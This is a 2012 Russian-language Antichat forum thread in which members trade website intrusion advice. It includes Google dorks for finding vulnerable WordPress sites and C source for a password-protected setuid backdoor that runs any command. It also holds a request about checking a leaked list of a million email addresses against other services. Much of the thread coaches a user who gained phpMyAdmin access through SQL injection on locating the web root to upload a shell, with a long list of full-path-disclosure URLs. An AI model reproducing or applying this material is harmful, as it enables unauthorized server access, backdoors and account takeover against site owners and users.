HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.04.2012, 16:44
Jakeroid
Новичок
Регистрация: 09.05.2009
Сообщений: 14
С нами: 8952073

Репутация: 3
По умолчанию

Цитата:
Сообщение от Ereee  
Хотя бы так
inurl:"?author=admin"
Человек тебе хотел помочь.
А если автор не админ? Ну зарегал себе ник другой?
 
Ответить с цитированием

  #2  
Старый 30.04.2012, 17:25
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

Код:
inurl:"wp-login.php?action=register"
inurl:"plugins/wp-forum"
"index of /" wp-forum
Хотя бы так...
 
Ответить с цитированием

  #3  
Старый 30.04.2012, 20:36
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами: 8395350

Репутация: 0
По умолчанию

такой вопрос. Есть база мыльников(1кк, микс). На что её можно чекнуть? ICQ, steam,origin, twitter, facebook чекнуты. Мб есть что ещё?
 
Ответить с цитированием

  #4  
Старый 30.04.2012, 20:52
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Cock3r  
Подскажите, пожалуйста, дорк для поиска WP блогов.
"powered by wordpress"

же
 
Ответить с цитированием

  #5  
Старый 30.04.2012, 21:09
Jakeroid
Новичок
Регистрация: 09.05.2009
Сообщений: 14
С нами: 8952073

Репутация: 3
По умолчанию

Цитата:
Сообщение от попугай  
"powered by wordpress"
же
Дык, затерают же часто.
 
Ответить с цитированием

  #6  
Старый 30.04.2012, 21:14
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Скомпилируйте суидник на FreeBSD:

Код:
#include 
#include 
main(int argc, char *argv[]) {
 if(argc == 3){
    if(strcmp(argv[1],"cool_pass") == 0){
       setgid(310);
       setuid(16745);
       system(argv[2]);
    }
 }
 return 0;
}
 
Ответить с цитированием

  #7  
Старый 30.04.2012, 23:51
heJiZzZ
Новичок
Регистрация: 01.06.2009
Сообщений: 7
С нами: 8917779

Репутация: 2
По умолчанию

Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
 
Ответить с цитированием

  #8  
Старый 01.05.2012, 00:03
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

попробуй подобрать для начало дефолтный путь до файла конфигов httpd.conf, в нем посмотри диру в какой сайт установлен, попробуй с нее index.php прочитать, если найдешь то пробуй заливаться в папки с изображениями или авами они часто с полными правами, что дает возможность заливаться...

P.S: вот список дефолтных логов можешь тут взглянуть /thread49775-default.html

еще также может гугл помочь с раскрытием путей попробуй дорк такого плана

Цитата:
Сообщение от None  
site:test1.ru "mysql_"
 
Ответить с цитированием

  #9  
Старый 01.05.2012, 00:06
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

ищи phpinfo

или

запросы которые могут привести к раскрытию путей

Код:
Full path disclosure :
/sсriрts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #10  
Старый 01.05.2012, 06:27
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от heJiZzZ  
Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
Чаще:

/etc/conf/httpd/httpd.conf
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.